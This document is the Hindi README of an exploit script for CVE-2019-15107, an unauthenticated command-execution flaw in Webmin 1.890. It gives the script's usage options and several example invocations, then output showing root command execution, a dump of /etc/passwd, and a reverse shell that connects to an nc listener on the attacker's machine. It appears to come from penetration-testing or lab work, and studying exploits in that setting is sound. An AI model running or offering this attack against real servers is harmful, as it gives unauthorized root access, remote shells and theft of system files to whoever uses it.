
CVE-2019-15107 Webmin बिना प्रमाणीकरण RCE
यह स्क्रिप्ट Webmin 1.890 में बिना प्रमाणीकरण के कमांड निष्पादन भेद्यता का शोषण करने के लिए डिज़ाइन की गई है। यह आपको लक्षित Webmin सर्वर पर मनमाने कमांड निष्पादित करने या रिवर्स शेल प्राप्त करने की अनुमति देती है।
यह एक्सप्लॉइट 5 तर्क लेता है:
$ python3 test.py -h
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]
Exploit unauthenticated command execution in Webmin 1.890.
options:
-h, --help show this help message and exit
required arguments:
-i IP Address, --ip IP Address
Target ip address
optional arguments:
-p Port number, --port Port number
Webmin port(default=10000)
-c Command, --command Command
OS Command to execute (Default=id)
--shell Get a reverse shell
-x, --proxy Sends requests through Burp Suite proxy at 127.0.0.1:8080.
Example:
python exploit.py -i 192.168.1.100
python exploit.py -i 192.168.1.100 -p 10000 -c whoami
python exploit.py -i 192.168.1.100 -x -c "ls -la"
python exploit.py -i 192.168.1.100 --shell
एकमात्र आवश्यक विकल्प -i है जो लक्ष्य का IP पता है।
केवल -i के साथ एक्सप्लॉइट चलाने पर पोर्ट 10000 पर स्थित लक्ष्य पर id कमांड निष्पादित होगा।
$ python3 exploit.py -i 10.200.105.200
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
आप -c या --command विकल्पों का उपयोग करके चलाए जाने वाले कमांड को निर्दिष्ट कर सकते हैं:
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]
आप --shell विकल्प का उपयोग करके भी रिवर्स शेल प्राप्त कर सकते हैं।
आपसे अपना IP पता और listening port दर्ज करने के लिए कहा जाएगा:
$ python3 exploit.py -i 10.200.105.200 --shell
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]#
-x या --proxy विकल्प जोड़कर आप अनुरोध को 127.0.0.1:8080 पर Burp प्रॉक्सी के माध्यम से भेज सकते हैं।